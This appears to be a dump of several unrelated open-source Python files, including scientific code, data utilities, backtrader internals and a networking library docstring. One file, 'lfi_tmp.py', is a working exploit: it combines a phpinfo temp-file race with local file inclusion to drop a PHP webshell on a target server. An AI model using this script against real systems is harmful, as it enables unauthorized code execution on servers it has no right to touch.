title = r'$\rho_{\mathrm{C}}\Big|_{t=%g}$' % t,
levels = None,
numLvls = 9,
scale = 'lin',
cmap = 'viridis',
tp = True,
show = False,
extend = 'neither',
cb_format = '%.1f')
plot_variable(u = Tn, name = 'T%g' % t, direc = plt_dir,
ext = '.pdf',
title = r'$T\Big|_{t=%g}$' % t,
levels = None,
numLvls = 9,
scale = 'lin',
cmap = 'viridis',
tp = True,
show = False,
extend = 'neither',
cb_format = '%.1f')
# start the timer :
start_time = time()
stars = "*****************************************************************"
initial_dt = dt
initial_alpha = params['newton_solver']['relaxation_parameter']
adaptive = False
plot_times = [31.0, 63.0, 93.0, 125.0]
times = arange(t0, tf+dt, dt)
# loop over all times :
for t in times:
# set the previous solution to the last iteration :
U1.assign(U)
# evolve boundary condition :
T_inf.t = t
# start the timer :
tic = time()
# Compute solution
if not adaptive:
solver.solve()
## solve mass equations, lowering time step on failure :
#if adaptive:
# par = params['newton_solver']
# solved_h = False
# while not solved_h:
# if dt < DOLFIN_EPS:
# status_h = [False,False]
# break
# U_temp = U.copy(True)
# U1_temp = U1.copy(True)
# status_h = solver.solve()
# solved_h = status_h[1]
# if not solved_h:
# dt /= 2.0
# print_text(stars, 'red', 1)
# s = ">>> WARNING: time step lowered to %g <<<"
# print_text(s % dt, 'red', 1)
# U.assign(U_temp)
# U1.assign(U1_temp)
# print_text(stars, 'red', 1)
# solve equation, lower alpha on failure :
if adaptive:
solved_u = False
par = params['newton_solver']
while not solved_u:
if par['relaxation_parameter'] < 0.5:
status_u = [False, False]
break
U_temp = U.copy(True)
U1_temp = U1.copy(True)
status_u = solver.solve()
solved_u = status_u[1]
if not solved_u:
U.assign(U_temp)
U1.assign(U1_temp)
par['relaxation_parameter'] /= 1.4
print_text(stars, 'red', 1)
s = ">>> WARNING: newton relaxation parameter lowered to %g <<<"
print_text(s % par['relaxation_parameter'], 'red', 1)
print_text(stars, 'red', 1)
U3n, pn, rho_Wn, rho_An, rho_Cn, Tn = U.split(True)
print_min_max(U3n, 'U3')
print_min_max(pn, 'p')
print_min_max(rho_Wn, 'rho_W')
print_min_max(rho_An, 'rho_A')
print_min_max(rho_Cn, 'rho_C')
print_min_max(Tn, 'T')
# increment time step :
s = '>>> Time: %g s, CPU time for last dt: %.3f s <<<'
print_text(s % (t, time()-tic), 'red', 1)
# save a plot :
if t in plot_times: plot_solution(U,t)
# for the subsequent iteration, reset the parameters to normal :
if adaptive:
if par['relaxation_parameter'] != initial_alpha:
print_text("::: resetting alpha to normal :::", 'green')
par['relaxation_parameter'] = initial_alpha
if dt != initial_dt:
print_text("::: resetting dt to normal :::", 'green')
dt = initial_dt
#===============================================================================
# post-processing :
# calculate total time to compute
sec = time() - start_time
mnn = sec / 60.0
hor = mnn / 60.0
sec = sec % 60
mnn = mnn % 60
text = "total time to perform transient run: %02d:%02d:%02d" % (hor,mnn,sec)
print_text(text, 'red', 1)
|
pf4d/wood_pyrolysis
|
diblasi/p_diblasi_1998.py
|
Python
|
gpl-3.0
| 20,019
|
#!/usr/bin/env python2
import sys, os
import json
import argparse
import sqlite3 as lite
con = None
def extant_file(x):
if not os.path.exists(x):
raise argparse.ArgumentError("{0} does not exist".format(x))
return x
def main():
parser = argparse.ArgumentParser(description="Import flairs")
parser.add_argument("-f", "--file", dest="filename", help="json input file", metavar="FILE", type=extant_file, required=True)
args = parser.parse_args()
try:
con = lite.connect('flair.db')
except lite.Error, e:
print "Error %s:" % e.args[0]
sys.exit(1)
curs = con.cursor()
curs.execute('''CREATE TABLE IF NOT EXISTS flair (
username TEXT PRIMARY KEY NOT NULL ,
flair_text TEXT,
flair_css_class TEXT,
lastpost timestamp,
lastpostid TEXT,
lastid TEXT DEFAULT ''
)''')
flair_json = json.load(open(args.filename))
curs.executemany('INSERT INTO flair (username, flair_text, flair_css_class) VALUES (:user, :flair_text, :flair_css_class)', flair_json)
con.commit()
if con:
con.close()
if __name__ == "__main__":
main()
|
thelectronicnub/redditswapbot
|
util/flair_sql_import.py
|
Python
|
gpl-3.0
| 1,111
|
from __future__ import print_function
import argparse, os, requests, json, csv, shutil, gzip
def dict_to_file(d):
with open('dictionary.tsv', 'w') as outFile:
writer = csv.writer(outFile, delimiter='\t')
writer.writerow(['file_id', 'case_id'])
for k in d:
writer.writerow([k, d[k]])
def filter_metadata(json_data, property):
# all useful data resides in ['data']['hits'][0]
case_id = json_data['data']['hits'][0]['cases'][0]['case_id']
def get_metadata(cwd, manifest_loc, data_folder_loc, meta_temp):
try:
os.mkdir(meta_temp)
except OSError:
print('meta_temp folder already exists! aborting...')
exit()
verboseprint('folder \'meta_temp\' created in cwd')
cases_endpt = 'https://gdc-api.nci.nih.gov/files/ids'
# we want to store the association between file_id and case_id
# we can use this dict to generate a tsv file for later
d = dict()
verboseprint('loading ' + manifest_loc + '...')
with open(manifest_loc, 'rb') as tsvFile:
print('fetching metadata for files in manifest...')
# it'd be nice to know how long this is going to take, so figure out how many files we have to look up.
# don't forget to return to the top of the file...
for line_count, value in enumerate(tsvFile):
pass
tsvFile.seek(0)
tsvData = csv.reader(tsvFile, delimiter='\t')
# skip header row of manifest file
next(tsvData, None)
for row in tsvData:
# get UUID of file from manifest, first column
file_id = row[0]
# notice comma at end, to print 'done' on same line
verboseprint(str(line_count) + '\tfetching case_id for ' + str(file_id) + '...', end=' ')
payload = {'query': file_id}
# what is the variable type of response? probably string... whatever, we'll convert it to json
response = requests.get(cases_endpt, params = payload)
data = response.json()
# let's dump the metadata to a file, just in case we need it later
path_to_json = os.path.normpath(os.path.join(meta_temp, str(file_id) + '_meta.json'))
with open(path_to_json, 'wb') as json_file:
json.dump(data, json_file, separators=(',', ': '), indent=4)
# hits contain a list of length 1, as do cases, so traversing the data requires list indices. I hope all data is formatted in this way...
case_id = data['data']['hits'][0]['cases'][0]['case_id']
d[file_id] = case_id
verboseprint('done')
line_count -= 1
verboseprint('file_id to case_id association written to ' + str(cwd) + '/dictionary.tsv\n')
verboseprint('aquisition complete.')
dict_to_file(d)
def remove_junk(file_id, all_files):
# we should be left with 2 files: the actual file and it's corresponding _meta.json file
try:
all_files.remove('logs')
except ValueError:
print('\nno logs folder found for file_id: ' + str(file_id))
print('was ' + str(file_id) + 'downloaded separately? moving on...')
try:
for f in all_files:
if f.startswith('.'):
all_files.remove(f)
except IndexError:
print('\nno files found for file_id: ' + file_id)
print('check for files before continuing! exiting...')
exit()
return all_files[0]
def filter_data(cwd, data_folder_loc):
verboseprint('filtering data of logs, annotations, and dot files...')
# we have more files in our download than we need. our goal is to extract only the files we need and leave the other ones alone
# we can accomplish this by creating a dictionary of pointers to the actual files and manipulating that
# then we do all the I/O at the end
# traverse data folder, store contents in dictionary
with open('dictionary.tsv', 'rb') as csvInput, open('dictionary_edit.tsv', 'wb') as csvOutput:
reader = csv.reader(csvInput, delimiter='\t')
writer = csv.writer(csvOutput, delimiter='\t')
next(reader, None) # skip header row of input file
writer.writerow(['file_id', 'case_id', 'filename']) # add header to output file.
for row in reader:
path_to_file_id = os.path.normpath(os.path.join(data_folder_loc, row[0]))
if os.path.isdir(path_to_file_id): # check if
# if we can avoid it, we don't want to have to deal with inferior data
# let's assume for now that annotated data is inferior
if os.listdir(path_to_file_id).count('annotations.txt') > 0:
next(reader, None) # skip this entry
else:
file_list = remove_junk(row[0], os.listdir(path_to_file_id))
writer.writerow([
row[0],
row[1],
file_list
])
# content[row[0]] = os.listdir(path_to_file_id) # file_id \t all files
# this overwrites the original file
os.rename('dictionary_edit.tsv', 'dictionary.tsv')
verboseprint('filtering complete')
def extract_data(cwd, data_folder_loc, extracted_folder_loc):
verboseprint('creating new folder hierarchy \'extracted\' in working directory...')
# create new folder structure and copy files
os.mkdir(extracted_folder_loc)
with open('dictionary.tsv', 'rb') as inFile:
tsvData = csv.reader(inFile, delimiter='\t')
# skip header
next(tsvData, None)
for row in tsvData:
path_to_case_id = os.path.normpath(os.path.join(extracted_folder_loc, row[1]))
if os.path.isdir(path_to_case_id):
pass
else:
os.mkdir(path_to_case_id)
# copy files to associated case_id folders
shutil.copyfile(
os.path.normpath(os.path.join(data_folder_loc, row[0], row[2])), # old file location
os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2])) # new file location
)
verboseprint('folder hierarchy complete')
def gunzip(cwd, extracted_folder_loc):
print('extracting gzipped files...')
with open('dictionary.tsv', 'rb') as tsvFile:
tsv_data = csv.reader(tsvFile, delimiter='\t')
next(tsv_data, None) # skip header
for row in tsv_data:
gzpd_file_loc = os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2]))
unzpd_file_loc = os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2][:-3]))
if gzpd_file_loc[-3:] != '.gz':
pass
else:
verboseprint('gunzipping ' + gzpd_file_loc)
zpd_data = gzip.open(gzpd_file_loc, 'rb')
unzpd = zpd_data.read()
with open(unzpd_file_loc, 'wb') as unzpd_file:
unzpd_file.write(unzpd)
os.remove(gzpd_file_loc)
verboseprint('extraction complete')
def mv_meta_files(cwd, meta_temp, extracted_folder_loc):
# WORK IN PROGRESS
with open('dictionary.tsv', 'rb') as tsvFile:
tsv_data = csv.reader(tsvFile, delimiter='\t')
next(tsv_data, None) # skip header
for row in tsv_data:
meta_file = os.normpath(os.join(meta_temp, row[0], '_meta.json'))
case_folder = None
for folder in os.listdir(meta_temp):
print(folder[:-10])
cwd = os.getcwd()
parser = argparse.ArgumentParser(description='reorganize the files downloaded from the TCGA Database into cases, in order to facilitate statistical analysis')
parser.add_argument('manifest_loc', help='the full path to your manifest.tsv file')
parser.add_argument('data_folder_loc', help='the full path to your data folder, which you downloaded from the TCGA with the manifest')
parser.add_argument('-v', action='store_true', help='verbose output')
args = parser.parse_args()
verboseprint = print if args.v else lambda *a, **k: None
print('')
if os.path.isfile(args.manifest_loc):
verboseprint('manifest accepted.')
else:
print('manifest file location is invalid. exiting\n')
exit()
# note! isdir() does not work with escaped characters
if os.path.isdir(args.data_folder_loc):
verboseprint('data folder accepted.\n')
# # if we want to traverse the folder hierarchy, we need to switch the cwd
# os.chdir(data_folder_loc)
else:
print('data folder location is invalid. exiting')
exit()
# define location of temporary folder for storing the meta.json files
meta_temp = os.path.normpath(os.path.join(cwd, 'meta_temp'))
# define folder location of final extracted data
extracted_folder_loc = os.path.normpath(os.path.join(cwd, 'extracted'))
get_metadata(cwd, args.manifest_loc, args.data_folder_loc, meta_temp)
filter_data(cwd, args.data_folder_loc)
extract_data(cwd, args.data_folder_loc, extracted_folder_loc)
gunzip(cwd, extracted_folder_loc)
# mv_meta_files(cwd, meta_temp, extracted_folder_loc)
print('\nprocessing complete. exiting')
|
poddus/tcga_fetch_n_clean
|
fetch_n_clean_0.0.1.py
|
Python
|
gpl-3.0
| 8,154
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'psybrowse.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^', include('psybrowse_app.urls')),
url(r'^admin/', include(admin.site.urls)),
)
|
jeff-hughes/PsyBrowse
|
psybrowse/urls.py
|
Python
|
gpl-3.0
| 346
|
"""
Platform dependend OS calls - Windows edition
FIXME Not tested, yet
"""
import logging
import win32gui
import ctypes
from PyQt5.QtCore import QDir, QStandardPaths, QByteArray, QBuffer, QIODevice
from extract_icon import ExtractIcon
LOGGER = logging.getLogger(__name__)
# Change windows 7 group ID
myappid = 'net.bitarbeiter.gameplay' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
def get_foreground_window():
""" Returns the name (or pointer, or whatever is
required as set_foreground_window argument)
of the currently active window
"""
return win32gui.GetForegroundWindow()
def set_foreground_window(handle):
""" Changes the currently active window """
win32gui.SetForegroundWindow(handle)
def find_icon_by_name(iconName):
""" Returns the content and content type of an Icon by name or path."""
# Check if iconName is an executable
path = QStandardPaths.findExecutable(iconName)
if path:
path = QDir.toNativeSeparators(path)
try:
extractor = ExtractIcon(path)
groups = extractor.get_group_icons()
if len(groups) > 0:
best = extractor.best_icon(groups[0])
exported = extractor.export(groups[0], best)
ba = QByteArray()
buf = QBuffer(ba)
buf.open(QIODevice.WriteOnly)
exported.save(buf, "png")
return (ba.data(), 'image/png')
except:
LOGGER.exception("Failed to load icon from %s" % path)
return (None, None)
# vim: set fenc=utf-8 ts=4 sw=4 noet :
|
Cybso/gameplay
|
gameplay/platform/windows.py
|
Python
|
gpl-3.0
| 1,468
|
#!/usr/bin/env python
# encoding=utf-8
# Author : idwar
# http://secer.org
'''
可能需要你改的几个地方:
1、host
2、port
3、request中的phpinfo页面名字及路径
4、hello_lfi() 函数中的url,即存在lfi的页面和参数
5、如果不成功或报错,尝试增加padding长度到7000、8000试试
6、某些开了magic_quotes_gpc或者其他东西不能%00的,自行想办法截断并在(4)的位置对应修改
Good Luck :)
7、payload的./指的是当前脚本的目录下,所以要注意最后输出的结果
'''
import re
import urllib2
import hashlib
from socket import *
from time import sleep
host = '192.168.227.133'
#host = gethostbyname(domain)
port = 80
shell_name = hashlib.md5(host).hexdigest() + '.php'
pattern = re.compile(r'''\[tmp_name\]\s=>\s(.*)\W*error]''')
payload = '''idwar<?php fputs(fopen('./''' + shell_name + '''\',"w"),"<?php phpinfo();?>")?>\r'''
req = '''-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r''' % payload
padding='A' * 8000
phpinfo_req ='''POST /phpinfo.php?a='''+padding+''' HTTP/1.0\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie='''+padding+'''\r
HTTP_ACCEPT: ''' + padding + '''\r
HTTP_USER_AGENT: ''' + padding + '''\r
HTTP_ACCEPT_LANGUAGE: ''' + padding + '''\r
HTTP_PRAGMA: ''' + padding + '''\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s''' % (len(req), host, req)
def hello_lfi():
while 1:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(phpinfo_req)
data = ''
while r'</body></html>' not in data:
data = s.recv(9999)
search_ = re.search(pattern, data)
if search_:
tmp_file_name = search_.group(1)
url = r'http://192.168.227.133/lfi/ex1.php?f=%s' % tmp_file_name
print url
search_request = urllib2.Request(url)
search_response = urllib2.urlopen(search_request)
html_data = search_response.read()
if 'idwar' in html_data:
s.close()
return '\nDone. Your webshell is : \n\n%s\n' % ('http://' + host + '/' + shell_name)
#import sys;sys.exit()
s.close()
if __name__ == '__main__':
print hello_lfi()
print '\n Good Luck :)'
|
hackersql/sq1map
|
Web/信息收集/pentest_tools/漏洞利用/web漏洞/lfi/lfi_tmp.py
|
Python
|
gpl-3.0
| 2,542
|
import json
from collections import OrderedDict
import os
class Config:
config_file_path = './config.json'
_instance = None
def __init__(self):
self.config = self.load_configs()
def load_configs(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(dir_path+'/config.json') as conf_file:
config = json.load(conf_file, object_pairs_hook = OrderedDict)
return config
def get_transports(self):
return self.config['transports']
def get_redis_conf(self):
return self.config['redis_host'], self.config['redis_port']
def get_static_path(self):
return self.config['static_path']
# singleton
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super().__new__(
cls, *args, **kwargs)
return cls._instance
|
MShel/PyChatBot
|
config/Config.py
|
Python
|
gpl-3.0
| 891
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from collections import OrderedDict
import itertools
import sys
import backtrader as bt
from .utils.py3 import zip, string_types, with_metaclass
def findbases(kls, topclass):
retval = list()
for base in kls.__bases__:
if issubclass(base, topclass):
retval.extend(findbases(base, topclass))
retval.append(base)
return retval
def findowner(owned, cls, startlevel=2, skip=None):
# skip this frame and the caller's -> start at 2
for framelevel in itertools.count(startlevel):
try:
frame = sys._getframe(framelevel)
except ValueError:
# Frame depth exceeded ... no owner ... break away
break
# 'self' in regular code
self_ = frame.f_locals.get('self', None)
if skip is not self_:
if self_ is not owned and isinstance(self_, cls):
return self_
# '_obj' in metaclasses
obj_ = frame.f_locals.get('_obj', None)
if skip is not obj_:
if obj_ is not owned and isinstance(obj_, cls):
return obj_
return None
class MetaBase(type):
def doprenew(cls, *args, **kwargs):
return cls, args, kwargs
def donew(cls, *args, **kwargs):
_obj = cls.__new__(cls, *args, **kwargs)
return _obj, args, kwargs
def dopreinit(cls, _obj, *args, **kwargs):
return _obj, args, kwargs
def doinit(cls, _obj, *args, **kwargs):
_obj.__init__(*args, **kwargs)
return _obj, args, kwargs
def dopostinit(cls, _obj, *args, **kwargs):
return _obj, args, kwargs
def __call__(cls, *args, **kwargs):
cls, args, kwargs = cls.doprenew(*args, **kwargs)
_obj, args, kwargs = cls.donew(*args, **kwargs)
_obj, args, kwargs = cls.dopreinit(_obj, *args, **kwargs)
_obj, args, kwargs = cls.doinit(_obj, *args, **kwargs)
_obj, args, kwargs = cls.dopostinit(_obj, *args, **kwargs)
return _obj
class AutoInfoClass(object):
_getpairsbase = classmethod(lambda cls: OrderedDict())
_getpairs = classmethod(lambda cls: OrderedDict())
_getrecurse = classmethod(lambda cls: False)
@classmethod
def _derive(cls, name, info, otherbases, recurse=False):
# collect the 3 set of infos
# info = OrderedDict(info)
baseinfo = cls._getpairs().copy()
obasesinfo = OrderedDict()
for obase in otherbases:
if isinstance(obase, (tuple, dict)):
obasesinfo.update(obase)
else:
obasesinfo.update(obase._getpairs())
# update the info of this class (base) with that from the other bases
baseinfo.update(obasesinfo)
# The info of the new class is a copy of the full base info
# plus and update from parameter
clsinfo = baseinfo.copy()
clsinfo.update(info)
# The new items to update/set are those from the otherbase plus the new
info2add = obasesinfo.copy()
info2add.update(info)
clsmodule = sys.modules[cls.__module__]
newclsname = str(cls.__name__ + '_' + name) # str - Python 2/3 compat
# This loop makes sure that if the name has already been defined, a new
# unique name is found. A collision example is in the plotlines names
# definitions of bt.indicators.MACD and bt.talib.MACD. Both end up
# definining a MACD_pl_macd and this makes it impossible for the pickle
# module to send results over a multiprocessing channel
namecounter = 1
while hasattr(clsmodule, newclsname):
newclsname += str(namecounter)
namecounter += 1
newcls = type(newclsname, (cls,), {})
setattr(clsmodule, newclsname, newcls)
setattr(newcls, '_getpairsbase',
classmethod(lambda cls: baseinfo.copy()))
setattr(newcls, '_getpairs', classmethod(lambda cls: clsinfo.copy()))
setattr(newcls, '_getrecurse', classmethod(lambda cls: recurse))
for infoname, infoval in info2add.items():
if recurse:
recursecls = getattr(newcls, infoname, AutoInfoClass)
infoval = recursecls._derive(name + '_' + infoname,
infoval,
[])
setattr(newcls, infoname, infoval)
return newcls
def isdefault(self, pname):
return self._get(pname) == self._getkwargsdefault()[pname]
def notdefault(self, pname):
return self._get(pname) != self._getkwargsdefault()[pname]
def _get(self, name, default=None):
return getattr(self, name, default)
@classmethod
def _getkwargsdefault(cls):
return cls._getpairs()
@classmethod
def _getkeys(cls):
return cls._getpairs().keys()
@classmethod
def _getdefaults(cls):
return list(cls._getpairs().values())
@classmethod
def _getitems(cls):
return cls._getpairs().items()
@classmethod
def _gettuple(cls):
return tuple(cls._getpairs().items())
def _getkwargs(self, skip_=False):
l = [
(x, getattr(self, x))
for x in self._getkeys() if not skip_ or not x.startswith('_')]
return OrderedDict(l)
def _getvalues(self):
return [getattr(self, x) for x in self._getkeys()]
def __new__(cls, *args, **kwargs):
obj = super(AutoInfoClass, cls).__new__(cls, *args, **kwargs)
if cls._getrecurse():
for infoname in obj._getkeys():
recursecls = getattr(cls, infoname)
setattr(obj, infoname, recursecls())
return obj
class MetaParams(MetaBase):
def __new__(meta, name, bases, dct):
# Remove params from class definition to avoid inheritance
# (and hence "repetition")
newparams = dct.pop('params', ())
packs = 'packages'
newpackages = tuple(dct.pop(packs, ())) # remove before creation
fpacks = 'frompackages'
fnewpackages = tuple(dct.pop(fpacks, ())) # remove before creation
# Create the new class - this pulls predefined "params"
cls = super(MetaParams, meta).__new__(meta, name, bases, dct)
# Pulls the param class out of it - default is the empty class
params = getattr(cls, 'params', AutoInfoClass)
# Pulls the packages class out of it - default is the empty class
packages = tuple(getattr(cls, packs, ()))
fpackages = tuple(getattr(cls, fpacks, ()))
# get extra (to the right) base classes which have a param attribute
morebasesparams = [x.params for x in bases[1:] if hasattr(x, 'params')]
# Get extra packages, add them to the packages and put all in the class
for y in [x.packages for x in bases[1:] if hasattr(x, packs)]:
packages += tuple(y)
for y in [x.frompackages for x in bases[1:] if hasattr(x, fpacks)]:
fpackages += tuple(y)
cls.packages = packages + newpackages
cls.frompackages = fpackages + fnewpackages
# Subclass and store the newly derived params class
cls.params = params._derive(name, newparams, morebasesparams)
return cls
def donew(cls, *args, **kwargs):
clsmod = sys.modules[cls.__module__]
# import specified packages
for p in cls.packages:
if isinstance(p, (tuple, list)):
p, palias = p
else:
palias = p
pmod = __import__(p)
plevels = p.split('.')
if p == palias and len(plevels) > 1: # 'os.path' not aliased
setattr(clsmod, pmod.__name__, pmod) # set 'os' in module
else: # aliased and/or dots
for plevel in plevels[1:]: # recurse down the mod
pmod = getattr(pmod, plevel)
setattr(clsmod, palias, pmod)
# import from specified packages - the 2nd part is a string or iterable
for p, frompackage in cls.frompackages:
if isinstance(frompackage, string_types):
frompackage = (frompackage,) # make it a tuple
for fp in frompackage:
if isinstance(fp, (tuple, list)):
fp, falias = fp
else:
fp, falias = fp, fp # assumed is string
# complain "not string" without fp (unicode vs bytes)
pmod = __import__(p, fromlist=[str(fp)])
pattr = getattr(pmod, fp)
setattr(clsmod, falias, pattr)
for basecls in cls.__bases__:
setattr(sys.modules[basecls.__module__], falias, pattr)
# Create params and set the values from the kwargs
params = cls.params()
for pname, pdef in cls.params._getitems():
setattr(params, pname, kwargs.pop(pname, pdef))
# Create the object and set the params in place
_obj, args, kwargs = super(MetaParams, cls).donew(*args, **kwargs)
_obj.params = params
_obj.p = params # shorter alias
# Parameter values have now been set before __init__
return _obj, args, kwargs
class ParamsBase(with_metaclass(MetaParams, object)):
pass # stub to allow easy subclassing without metaclasses
class ItemCollection(object):
'''
Holds a collection of items that can be reached by
- Index
- Name (if set in the append operation)
'''
def __init__(self):
self._items = list()
self._names = list()
def __len__(self):
return len(self._items)
def append(self, item, name=None):
setattr(self, name, item)
self._items.append(item)
if name:
self._names.append(name)
def __getitem__(self, key):
return self._items[key]
def getnames(self):
return self._names
def getitems(self):
return zip(self._names, self._items)
def getbyname(self, name):
idx = self._names.index(name)
return self._items[idx]
|
mementum/backtrader
|
backtrader/metabase.py
|
Python
|
gpl-3.0
| 11,160
|
## Copyright (C) 2012 by Kevin L. Mitchell <klmitch@mit.edu>
##
## This program is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see
## <http://www.gnu.org/licenses/>.
"""
==============================================
Tendril Frame-based Network Connection Tracker
==============================================
Tendril is a network communication library based on two main features:
it is based on sending and receiving frames, and it tracks the state
of an abstract connection as defined by the application. Tendril is
designed to be easy to use: creating an application requires
subclassing the ``Application`` class and providing an implementation
for the recv_frame() method; then get a ``TendrilManager`` class
instance and start it, and Tendril manages the rest.
Tendril Concepts
================
Frames
------
Tendril is based on the concept of passing around frames or packets of
data. The fact is, most network protocols are based on sending and
receiving frames; for instance, in the SMTP protocol used for sending
email, the sender will start off sending the frame "MAIL FROM
email@example.com" followed by a line termination sequence (a carriage
return followed by a newline). The SMTP server will then respond with
another frame acknowledging the "MAIL FROM" frame, and that frame will
also end with a line termination sequence. Thus, even though SMTP is
defined on top of the TCP protocol, which provides an undivided stream
of data between the client and server, a framing boundary is imposed
upon it--in this case, the carriage return followed by a newline that
terminates each frame.
Tendril includes the concept of *framers*. A framer is nothing more
than a subclass of ``Framer`` which has one method which extracts a
single frame from the stream of undifferentiated data, and another
method which converts a frame into an appropriate representation. In
the case of the SMTP protocol exchange above, the ``frameify()``
method finds each line terminated by the carriage return-newline pair,
strips off those characters, and returns just the frame. In the same
way, the corresponding ``streamify()`` method takes the frame and
appends a carriage return-newline pair.
For text-based protocols such as SMTP, this may seem like overkill.
However, for binary-based protocols, a lot of code is dedicated to
determining the boundaries between frames, and in some cases even
decoding the frame. Tendril's concept of a framer for a connection
enables the framing logic to be isolated from the rest of the
application, and even reused: Tendril comes with several pre-built
framers, including framers designed to work with a text-based protocol
such as SMTP.
Another important advantage of the framer concept is the ability to
switch between framers as needed. Taking again the example of the
SMTP protocol--the actual email data is transferred to the server by
the client first sending a "DATA" frame; the server responds
indicating that it is ready to begin receiving the message data, and
then the client simply sends the message data, ending it with a line
containing only a single period ("."). In this case, an SMTP server
application based on Tendril may wish to receive the message data as a
single frame; it can do this by creating a framer which buffers stream
data until it sees that ending sentinel (the period on a line by
itself), then returns the whole message as a single frame. Once the
server receives the "DATA" frame from the client, all it has to do is
temporarily switch out the framer in use for the receiving side of the
connection, then switch it back to the standard line-based framer once
it has received the message frame.
Tendril allows for different framers to be used on the receiving side
and sending side of the connection. This could be used in a case like
the SMTP server example cited above, where the server still wishes to
send line-oriented frames to the client, even while buffering a
message data frame. In addition, although the provided framers deal
with byte data, Tendril itself treats the frames as opaque;
applications can use this to build a framer that additionally parses a
given frame into a class object that the rest of the application then
processes as necessary.
Connection Tracking
-------------------
Tendril is also based on the concept of tracking connection state.
For connection-oriented protocols such as TCP, obviously, this is not
a big problem; however, Tendril is also designed to support
connectionless protocols such as UDP, where some applications need to
manage state information relevant to a given exchange. As an
admittedly contrived example, consider DNS, which is based on UDP. A
client of the DNS system will send a request to a DNS server over UDP;
when a response is received from that DNS server, the connection state
information tracked by Tendril can help connect that response with the
appropriate request, ensuring that the response goes to the right
place.
This connection state tracking is primarily intended to assist
applications which desire to be available over both
connection-oriented protocols such as TCP and over connectionless
protocols such as UDP. Although Tendril does not address reliability
or frame ordering, its connection state tracking eases the
implementation of an application which utilizes both types of
protocols.
Extensibility
-------------
Careful readers may have noticed the use of the terms, "such as TCP"
and "such as UDP." Although Tendril only has built-in support for TCP
and UDP connections, it is possible to extend Tendril to support other
protocols. All that is required is to create subclasses of
``Tendril`` (representing an individual connection) and of
``TendrilManager`` (which accepts and creates connections and manages
any necessary socket data flows), and to register the
``TendrilManager`` subclasses as ``pkg_resources`` entry points under
the ``tendril.manager`` namespace. See the ``setup.py`` for Tendril
for an example of how this may be done.
In addition to allowing Tendril to support protocols other than TCP
and UDP, it is also possible to implement new framers by subclassing
the ``Framer`` class. (Note: as Tendril deals with ``Framer``
objects, it is not necessary to register these framers using
``pkg_resources`` entry points.) Objects of these classes may then
simply be assigned to the appropriate ``framers`` attribute on the
``Tendril`` instance representing the connection.
Advanced Interfaces
-------------------
Tendril also provides an advanced interface that allows a given raw
socket to be "wrapped." Using this feature, an ordinary TCP socket
could be converted into an SSL socket. Other uses for this interface
are possible, such as setting socket options for the socket. Tendril
also provides an interface to allow multiple of these wrapper
functions to be called in a given order.
Standard Usage
==============
The first step in using Tendril is to define an application by
subclassing the ``Application`` class. (Subclassing is not strictly
necessary--Tendril uses Python's standard ``abc`` package for defining
abstract base classes--but using subclassing will pull in a few
helpful and/or required methods.) The subclass need merely implement
the recv_frame() method, which will be called when a frame is
received. The ``Application`` subclass constructor itself can be the
*acceptor* to be used by Tendril (more on acceptors in a moment).
Once the ``Application`` subclass has been created, the developer then
needs to get a ``TendrilManager`` instance, using the
``get_manager()`` factory function. The exact call to
``get_manager()`` depends on the needs; for making outgoing
connections, simply calling ``get_manager("tcp")`` is sufficient. If
listening on a port or making an outgoing connection from a specific
address and/or port is desired, the second argument to
``get_manager()`` may be a tuple of the desired local IP address and
the port number (i.e., ``("127.0.0.1", 80)``).
All managers must be started, and ``get_manager()`` does not start the
manager by itself. Check the manager's ``running`` attribute to see
if the manager is already running, and if it is not, call its
``start()`` method. To accept connections, pass ``start()`` the
*acceptor* (usually the ``Application`` subclass). The ``start()``
method also accepts a *wrapper*, which will be called with the
listening socket when it is created.
If, instead of accepting connections (as a server would do), the
desire is to make outgoing connections, simply call ``start()`` with
no arguments, then call the ``connect()`` method of the manager. This
method takes the *target* of the connection (i.e., the IP address and
port number, as a tuple) and the *acceptor*. (It also has an optional
*wrapper*, which will be called with the outgoing socket just prior to
initiating the connection.)
Acceptors
---------
An *acceptor* is simply a callable taking a single argument--the
``Tendril`` instance representing the connection--and returning an
instance of a subclass of ``Application``, which will be assigned to
the ``application`` attribute of the ``Tendril`` instance. The
acceptor initializes the application; it also has the opportunity to
manipulate that ``Tendril``, such as setting framers, calling the
``Tendril`` instance's ``wrap()`` method, or simply closing the
connection.
Although the ``TendrilManager`` does not provide the opportunity to
pass arguments to the acceptor, it is certainly possible to do so.
The standard Python ``functools.partial()`` is one obvious interface,
but Tendril additionally provides its own ``TendrilPartial`` utility;
